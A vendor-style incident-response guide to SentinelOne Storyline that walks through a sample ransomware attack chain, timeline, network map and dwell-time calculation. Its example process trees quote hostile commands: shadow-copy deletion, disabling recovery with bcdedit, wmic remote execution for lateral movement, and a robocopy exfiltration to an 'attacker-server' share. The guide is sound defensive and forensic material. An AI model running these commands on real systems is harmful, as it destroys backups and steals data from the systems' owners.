SentinelOne Timeline Forensics and Attack Chain Analysis

SCENARIO

Understanding the complete attack chain requires correlating hundreds of events (process creation, network connections, file modifications, registry changes) into a cohesive narrative. Traditional forensics tools require exporting logs and manually reconstructing timelines. Security analysts need visual, interactive attack chain analysis to quickly understand attack progression from initial access to final objectives.

Use this guide when you need to:

• Visualize complete attack chains from initial compromise to final payload
• Understand parent-child process relationships and lateral movement paths
• Reconstruct incident timelines for forensic analysis or legal proceedings
• Identify all affected systems and data exfiltration attempts
• Determine attack dwell time (time between compromise and detection)
• Generate visual attack diagrams for executive briefings

Business Impact:

• Faster investigations: Visual timelines reduce investigation time from hours to minutes
• Complete attack visibility: See entire attack chain, not just isolated events
• Dwell time calculation: Measure time between compromise and detection
• Executive communication: Visual diagrams explain complex attacks simply

SentinelOne Storyline provides visual attack chain reconstruction with interactive timelines, process trees, and network connection mapping.

REQUIREMENTS & ASSUMPTIONS

Prerequisites:

• SentinelOne Singularity Complete license: Storyline included
• Deep Visibility data: Full telemetry required for complete timelines

PROCESS

Step 1: Access Storyline for threat investigation

1. Navigate to Console → Threats → [Threat Alert]

2. Click "View Storyline" button

3. Storyline interface displays:

   • Process Tree (left): Hierarchical view of parent-child processes
   • Timeline (center): Chronological events
   • Details Pane (right): Event metadata
   • Network Map (optional): Network connections visualized

Step 2: Analyze process execution tree

Example: Ransomware attack chain

Process Tree View:

explorer.exe (user: jdoe)
  └─ invoice.pdf.exe (malicious attachment executed by user)
       ├─ powershell.exe -encodedcommand ... (downloads payload)
       │    └─ malware.exe (ransomware binary)
       │         ├─ vssadmin.exe delete shadows /all (delete backups)
       │         ├─ wmic.exe shadowcopy delete (delete shadow copies)
       │         ├─ bcdedit.exe /set {default} recoveryenabled No (disable recovery)
       │         └─ [1,547 file encryption operations]
       └─ cmd.exe /c whoami && ipconfig (reconnaissance)

Key Observations:

• Initial Access: User executed invoice.pdf.exe (phishing attachment)
• Execution: Spawned PowerShell with encoded command (obfuscation)
• Impact: Deleted backups, disabled recovery, encrypted 1,547 files
• Dwell Time: 23 minutes from initial execution to encryption

Result: Complete attack chain visualized with parent-child relationships.

Step 3: Analyze attack timeline

1. Switch to Timeline view (horizontal timeline)

Timeline Events (chronological):

14:30:15 - User downloads invoice.pdf.exe (Email attachment)
14:32:00 - User executes invoice.pdf.exe (Double-click from Downloads)
14:32:05 - Process Creation: powershell.exe -enc [base64]
14:32:10 - Network Connection: powershell.exe → 198.51.100.75:443 (C2 server)
14:32:15 - File Creation: C:\ProgramData\malware.exe (payload downloaded)
14:32:20 - Process Creation: malware.exe (ransomware executes)
14:32:25 - Process Creation: vssadmin.exe delete shadows /all
14:33:00 - File Modification: C:\Users\jdoe\Documents\*.docx → *.locked (encryption begins)
14:45:30 - File Creation: C:\Users\jdoe\Desktop\README.txt (ransom note)
14:50:00 - SentinelOne Detection: Behavioral AI detects ransomware → Auto-quarantine

Key Metrics:

• Time to Initial Access: 14:32:00 (user executed malicious file)
• Time to Impact: 14:33:00 (encryption started)
• Time to Detection: 14:50:00 (SentinelOne blocked)
• Dwell Time: 18 minutes (initial access to detection)

Result: Precise timeline shows attack progression and detection speed.

Step 4: Map network connections and C2 communication

1. Switch to Network Map view

Network Connections Visualized:

Endpoint: WKS-FINANCE-05 (10.1.50.22)
  ↓ Outbound Connection
198.51.100.75:443 (malicious-c2-server.com)
  - Protocol: HTTPS
  - Bytes Sent: 150 KB (likely encrypted commands)
  - Bytes Received: 5 MB (payload downloaded)
  - Duration: 30 seconds

Lateral Movement Attempt:
WKS-FINANCE-05 → WKS-FINANCE-10 (10.1.50.30)
  - Protocol: SMB (TCP 445)
  - Action: File copy attempt (blocked by SentinelOne)

IOCs Extracted:

• Malicious IP: 198.51.100.75
• Malicious Domain: malicious-c2-server.com
• Payload URL: http://198.51.100.75/payload.exe

Result: Complete network activity mapped, C2 infrastructure identified.

Step 5: Identify lateral movement and data exfiltration

Lateral Movement Detection:

Look for:

• Remote execution (PsExec, WMI, RDP connections)
• File copy operations to other endpoints
• Credential access (LSASS dumps, password spraying)

Example Storyline - Lateral Movement:

WKS-FINANCE-05 (compromised)
  └─ wmic.exe /node:WKS-FINANCE-10 process call create "malware.exe"
       └─ SMB Connection: \\WKS-FINANCE-10\C$\Windows\Temp\malware.exe (file staged)
            └─ Process Creation on WKS-FINANCE-10: malware.exe (successful lateral movement)

Data Exfiltration Detection:

Look for:

• Large outbound transfers (>10 MB)
• Cloud storage uploads (Dropbox, Google Drive)
• FTP/SFTP connections
• USB storage writes

Example Storyline - Data Exfiltration:

robocopy.exe C:\Confidential \\attacker-server\share /E /Z
  └─ Network Connection: 203.0.113.100:445 (attacker file server)
       └─ Bytes Sent: 2.3 GB (confidential data exfiltrated)

Result: Lateral movement paths and data theft identified.

Step 6: Calculate attack dwell time

Dwell Time Definition: Time between initial compromise and detection/remediation.

How to Calculate from Storyline:

1. Identify Initial Access Event: First malicious activity

   • Example: 2025-11-26 14:32:00 (user executed malware)

2. Identify Detection Event: When SentinelOne detected threat

   • Example: 2025-11-26 14:50:00 (behavioral AI triggered)

3. Calculate Dwell Time:

   Dwell Time = Detection Time - Initial Access Time
   Dwell Time = 14:50:00 - 14:32:00 = 18 minutes
   

Industry Benchmarks:

• Average Dwell Time (2025): 21 days
• Ransomware Dwell Time: 3-5 days
• SentinelOne Automated Detection: Minutes to hours

Result: Quantify how quickly threats are detected and contained.

Step 7: Export timeline for forensic reports

1. Click Export Timeline

2. Select format:

   • PDF: Visual timeline diagram for reports
   • JSON: Machine-readable format for SIEM integration
   • CSV: Event list for spreadsheet analysis

3. Generate forensic report:

   Report includes:
   - Complete event timeline
   - Process tree diagram
   - Network connection map
   - IOCs (file hashes, IPs, domains)
   - MITRE ATT&CK technique mappings
   

4. Use report for:

   • Incident response documentation
   • Legal proceedings (chain of custody)
   • Executive briefings
   • Post-incident reviews

Result: Professional forensic report generated from Storyline data.

Step 8: Use Storyline for root cause analysis

Questions Storyline Answers:

1. How did the attacker gain initial access?

   • Review earliest events in timeline
   • Common: Phishing attachment, exploit, credential theft

2. What was the initial payload?

   • Identify first malicious file created/executed
   • Example: malware.exe downloaded via PowerShell

3. What persistence mechanisms were created?

   • Search for:
     • Registry Run keys created
     • Scheduled tasks created
     • Services installed

4. Was data exfiltrated?

   • Review network connections for large uploads
   • Check for file staging operations

5. Which systems were compromised?

   • Trace lateral movement attempts
   • Identify all endpoints with related threats

Result: Complete incident root cause analysis from visual timeline.

VERIFICATION

Verify Storyline is operational:

1. Navigate to any threat: Console → Threats → [Threat]
2. Click "View Storyline"
3. Verify timeline displays: Process tree, events, timestamps visible

TROUBLESHOOTING

Issue: Storyline shows incomplete data

Solutions:

1. Check data retention: Events older than retention period won't display
2. Verify agent was online: Offline endpoints don't send telemetry
3. Wait for data ingestion: Recent events may take 1-2 minutes to appear

Issue: Cannot export timeline

Solutions:

1. Check browser pop-up blocker: May block PDF download
2. Verify permissions: User must have Report Export permissions

REFERENCES

• SentinelOne Storyline Technology
• Understanding SentinelOne EDR

Document Version: 1.0 Last Updated: 2025-11-26

Related Reading

• Invoke SentinelOne Threat Hunt
• SentinelOne Control vs Complete Feature Comparison
• SentinelOne Deep Visibility Threat Hunting